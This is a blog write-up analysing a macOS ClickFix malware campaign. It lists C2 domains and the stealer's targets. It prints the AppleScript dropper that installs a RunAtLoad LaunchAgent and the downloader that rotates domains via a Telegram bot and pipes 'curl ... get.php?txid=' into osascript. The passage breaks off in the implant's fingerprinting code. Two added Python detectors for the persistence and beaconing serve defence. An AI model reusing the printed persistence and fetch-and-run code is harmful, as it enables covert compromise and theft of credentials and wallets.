Malware Insights: macOS Phexia Campaign


Malware Insights: MacOS Phexia Campaign | Cookie Engineer's Weblog


I got nerdsniped today. Some compromised website wanted me to execute a command in the Terminal.app because I've set my User-Agent to a randomized profile and it was a macOS browser.

Overview

CNC domains: x2db.cx, a5db.ch, a6b6.biz, kfcnevkusno.one

CNC bots: t.me/neverfakebot

CNC networks: Cloudflare

Target OS: MacOS

Target Apps: (All) crypto wallets, (All) Browsers, Password extensions, Keychains, Browser Cookies, Browser History, Telegram Auth Data

Botnet Operator: (Unconfirmed by third-parties) APT28

Stage 1: Clickfix Attack

A compromised website asks you to execute a Clickfix payload via Cmd + C and Cmd + V right into the Terminal.app, having already placed the downloader's script command into your clipboard.

The initial payload for the downloader was obfuscated with base64 encoding and does a curl request to download and execute an osascript file, which caught my curiosity.

osascript -e "$(echo "... base64encoded ..." | base64 -d)"

Dropper Source Code

do shell script "
SCRIPT_PATH=\"$HOME/Library/pwvrskwjcwvtcrjr\";
mkdir -p \"$HOME/Library/LaunchAgents\";
cat > \"$HOME/Library/LaunchAgents/com.components.pwvrskwjcwvtcrjr.plist\" << END_PLIST
<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<plist version=\"1.0\">
<dict>
    <key>Label</key>
    <string>com.launch.pwvrskwjcwvtcrjr</string>
    <key>ProgramArguments</key>
    <array>
        <string>/usr/bin/osascript</string>
        <string>$SCRIPT_PATH</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
END_PLIST
"
do shell script "echo \"...base64encoded_implant_downloader...\" | base64 -d > ~/Library/pwvrskwjcwvtcrjr"
do shell script "launchctl unload ~/Library/LaunchAgents/com.components.pwvrskwjcwvtcrjr.plist 2>/dev/null"
do shell script "launchctl load ~/Library/LaunchAgents/com.components.pwvrskwjcwvtcrjr.plist"

Dropper Summary

Installs a RunAtLoad configuration to ~/Library/LaunchAgents/com.components.pwvrskwjcwvtcrjr.plist

Installs a LaunchAgent via launchctl load

Downloads and executes the second-stage payload into ~/Library/
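A defender-side hunt for this persistence pattern, added here as an example (it is not part of the write-up, nor the malware's code): it parses LaunchAgent plists with Python's plistlib and flags agents that invoke osascript on a bare file directly under ~/Library, or whose Label disagrees with the plist filename, both of which the dropper above does. The sample plist, the "victim" home directory and the function names are constructed for this example; the label, path and keys are the ones the dropper writes.

```python
import plistlib
import re
from pathlib import Path

# Constructed sample plist mirroring what the dropper writes (values from the write-up);
# the user directory "victim" is a placeholder.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.launch.pwvrskwjcwvtcrjr</string>
  <key>ProgramArguments</key>
  <array><string>/usr/bin/osascript</string><string>/Users/victim/Library/pwvrskwjcwvtcrjr</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

# Interpreters that a legitimate LaunchAgent rarely needs to invoke directly
INTERPRETERS = {"osascript", "sh", "bash", "zsh", "python3", "curl"}
# A bare, extension-less file placed directly under ~/Library (not inside a subfolder)
LOOSE_LIBRARY_FILE = re.compile(r"^(~|/Users/[^/]+)/Library/[A-Za-z0-9_-]+$")


def assess_plist(filename: str, data: bytes) -> list[str]:
    """Return findings for one LaunchAgent plist; an empty list means nothing suspicious."""
    try:
        plist = plistlib.loads(data)
    except Exception as exc:  # malformed plists are worth a look too
        return [f"unparseable plist: {exc}"]
    findings = []
    args = plist.get("ProgramArguments") or []
    program = Path(plist.get("Program") or (args[0] if args else "")).name
    label = plist.get("Label", "")
    # The dropper's Label (com.launch.*) does not match its filename (com.components.*)
    if label and label != Path(filename).stem:
        findings.append(f"Label {label!r} does not match filename {filename!r}")
    if program in INTERPRETERS:
        findings.append(f"ProgramArguments invokes interpreter {program!r} directly")
    for arg in args[1:]:
        if LOOSE_LIBRARY_FILE.match(arg):
            findings.append(f"executes loose file under ~/Library: {arg}")
    if plist.get("RunAtLoad") and findings:
        findings.append("RunAtLoad is set, so this runs at every login")
    return findings


def scan_launch_agents(directory: Path) -> dict[str, list[str]]:
    """Assess every *.plist in a LaunchAgents directory and keep only the hits."""
    hits = {}
    for path in sorted(directory.glob("*.plist")):
        findings = assess_plist(path.name, path.read_bytes())
        if findings:
            hits[path.name] = findings
    return hits
```

Run scan_launch_agents(Path.home() / "Library/LaunchAgents") on a Mac to apply the same checks to real agents; unload anything it flags with launchctl before removing the plist and the script it points to.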

Stage 2: Control Server Connection and Implant Downloader Loop

The CNC connection loop is implemented with another osascript which also requests new domains via a Telegram Bot that is owned by the botnet operator.

Downloader

property domainsList : {"example.com", "another-example.com", "etc-pp.com"}
property activeDomain : ""
property btxid : "campaign-identifier"

on setDomain()
    repeat with d in domainsList
        set domain to (contents of d)
        set urlresult to "http://" & domain & "/api.php?check"
        set actualurl to "http://" & domain & "/"
        try
            set response to do shell script "/usr/bin/curl -s --connect-timeout 5 --max-time 10 " & quoted form of urlresult
            if response is "success" then
                set activeDomain to actualurl
                return true
            end if
        end try
    end repeat
    try
        set domain to do shell script "curl -s --connect-timeout 5 --max-time 10 https://t.me/botnet-bot-with-statusmessage | sed -n 's/.*\\([^.*/\\1/p'"
        set urlresult to "http://" & domain & "/api.php?check"
        set actualurl to "http://" & domain & "/"
        set response to do shell script "curl -s --connect-timeout 5 --max-time 10 " & quoted form of urlresult
        if response is "success" then
            set activeDomain to actualurl
            return true
        end if
    end try
    return false
end setDomain

if setDomain() then
    set startsrc to "curl -s " & quoted form of (activeDomain & "get.php?txid=" & btxid) & " | osascript"
    do shell script startsrc
end if

Downloader Summary

Checks the Telegram Bot owned by the botnet operator for changed CNC server domains

Requests /api.php?check and /get.php?txid=... to download the malware implant

Downloads and executes the third-stage malware implant
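Detection logic for the downloader's beaconing, added here as an example and not taken from the write-up: it scores egress-proxy log lines per source host for the /api.php?check probe answered with a body the size of a bare "success", the /get.php?txid= fetch on the same domain, probes spread across several domains, and a t.me page fetched by curl. The log format, the sample lines and the function name are constructed for the example; the hostnames, paths and the Telegram bot are the write-up's own indicators.

```python
import re
from collections import defaultdict

# Constructed sample egress-proxy log: "<ts> <src> <method> <url> <status> <bytes> <user-agent>".
# 10.0.0.7 mimics an infected Mac, 10.0.0.9 is ordinary browsing with similar-looking paths.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.7 GET http://x2db.cx/api.php?check 200 7 curl/8.4.0
2024-05-01T10:00:02Z 10.0.0.7 GET http://x2db.cx/get.php?txid=campaign-identifier 200 41233 curl/8.4.0
2024-05-01T10:00:09Z 10.0.0.7 GET https://t.me/neverfakebot 200 9812 curl/8.4.0
2024-05-01T10:00:10Z 10.0.0.7 GET http://kfcnevkusno.one/api.php?check 200 7 curl/8.4.0
2024-05-01T10:05:00Z 10.0.0.9 GET https://example.org/api.php?check 200 3000 Mozilla/5.0
2024-05-01T10:06:00Z 10.0.0.9 GET https://example.org/news/get.php?txid=1 200 1200 Mozilla/5.0
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+) (.+)$")
CHECK = re.compile(r"^https?://([^/:]+)(?::\d+)?/api\.php\?check$")   # liveness probe
STAGE = re.compile(r"^https?://([^/:]+)(?::\d+)?/get\.php\?txid=")    # implant fetch
TME = re.compile(r"^https?://t\.me/")                                   # bot-hosted domain lookup


def find_beaconing(log_text: str) -> dict[str, list[str]]:
    """Return {source_ip: [reasons]} for sources that show the downloader's pattern."""
    per_src = defaultdict(lambda: {"check": set(), "stage": set(), "tme": False, "curl": False})
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        _ts, src, _method, url, _status, size, agent = m.groups()
        rec = per_src[src]
        rec["curl"] |= agent.startswith("curl/")
        if (mc := CHECK.match(url)) and int(size) <= 16:  # the bare "success" body is 7 bytes
            rec["check"].add(mc.group(1))
        if ms := STAGE.match(url):
            rec["stage"].add(ms.group(1))
        if TME.match(url) and agent.startswith("curl/"):
            rec["tme"] = True
    verdicts = {}
    for src, rec in per_src.items():
        reasons = []
        both = sorted(rec["check"] & rec["stage"])
        if both:
            reasons.append("api.php?check then get.php?txid= on " + ", ".join(both))
        if len(rec["check"]) > 1:
            reasons.append("api.php?check probes against several domains (rotation)")
        if rec["tme"]:
            reasons.append("t.me page fetched by curl (domain lookup via Telegram bot)")
        if reasons and rec["curl"]:
            reasons.append("traffic originates from curl, not a browser")
        if reasons:
            verdicts[src] = reasons
    return verdicts
```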

Stage 3: Malware Implant

The Malware Implant is a little more sophisticated than initially expected.

UUID Fingerprinting

on getUUID()
    set methods to {¬
        "ioreg -rd1 -c IOPlatformExpertDevice | awk -F'\"' '/IOPlatformUUID/{print $4}'", ¬
        "ioreg -rd1 -c IOPlatformExpertDevice | grep -o '\"IOPlatformUUID\"[^,]*' | cut -d'\"' -f4", ¬
        "system_profiler SPHardwareDataType 2>/dev/null | awk '/UUID/{print $NF}'", ¬
        "system_profiler SPHardwareDataType 2>/dev/null | grep -i 'uuid' | awk '{print...
